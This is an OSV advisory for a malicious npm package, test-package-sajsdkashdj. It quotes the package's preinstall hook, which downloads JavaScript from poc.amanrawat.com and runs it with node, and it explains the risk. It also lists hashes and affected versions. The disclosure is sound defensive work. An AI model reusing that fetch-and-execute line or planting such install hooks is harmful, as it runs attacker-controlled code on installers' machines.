MAL-2026-6266

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-package-sajsdkashdj/MAL-2026-6266.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6266

Published

2026-06-22T17:37:23Z

Modified

2026-06-22T18:31:22.824851717Z

Summary

Malicious code in test-package-sajsdkashdj (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87)

package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "542596accdcd18f95701775537c8d2a26a97a25cc9498a9da490271b05b1d702",
            "id": "IN-MAL-2026-007138",
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:29Z",
            "versions": [
                "2.1.6"
            ],
            "import_time": "2026-06-22T18:25:27.928309737Z"
        },
        {
            "sha256": "62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87",
            "id": "IN-MAL-2026-007137",
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:23Z",
            "versions": [
                "2.1.7"
            ],
            "import_time": "2026-06-22T18:25:27.815597367Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / test-package-sajsdkashdj

Package

Name: test-package-sajsdkashdj; View open source insights on deps.dev
Purl: pkg:npm/test-package-sajsdkashdj

Affected ranges

Affected versions

2.*

2.1.6

2.1.7

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-package-sajsdkashdj/MAL-2026-6266.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "sha256": "bde307751693a74b5da57b277ac43deda04060ba9976804c1aa38579f70ac70f",
            "tlsh": "b3e020308b63523755c41292486fa41fd6919f7f500a7c0c63ab042d80cb57758fe71c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "test-package-sajsdkashdj-2.1.6.tgz",
            "hashes": {
                "sha1": "5606c5611600aec1314c631503520538aecc6a53",
                "sha512_sri": "sha512-hqsKDcYCc1n8pAXKZwSYKtXXjFKVSoaMqFNHdiLkgNCsdIPsQg8pzzUYUY9+zs4bG09x+71f1O5fmtyD8putVg=="
            }
        }
    ]
}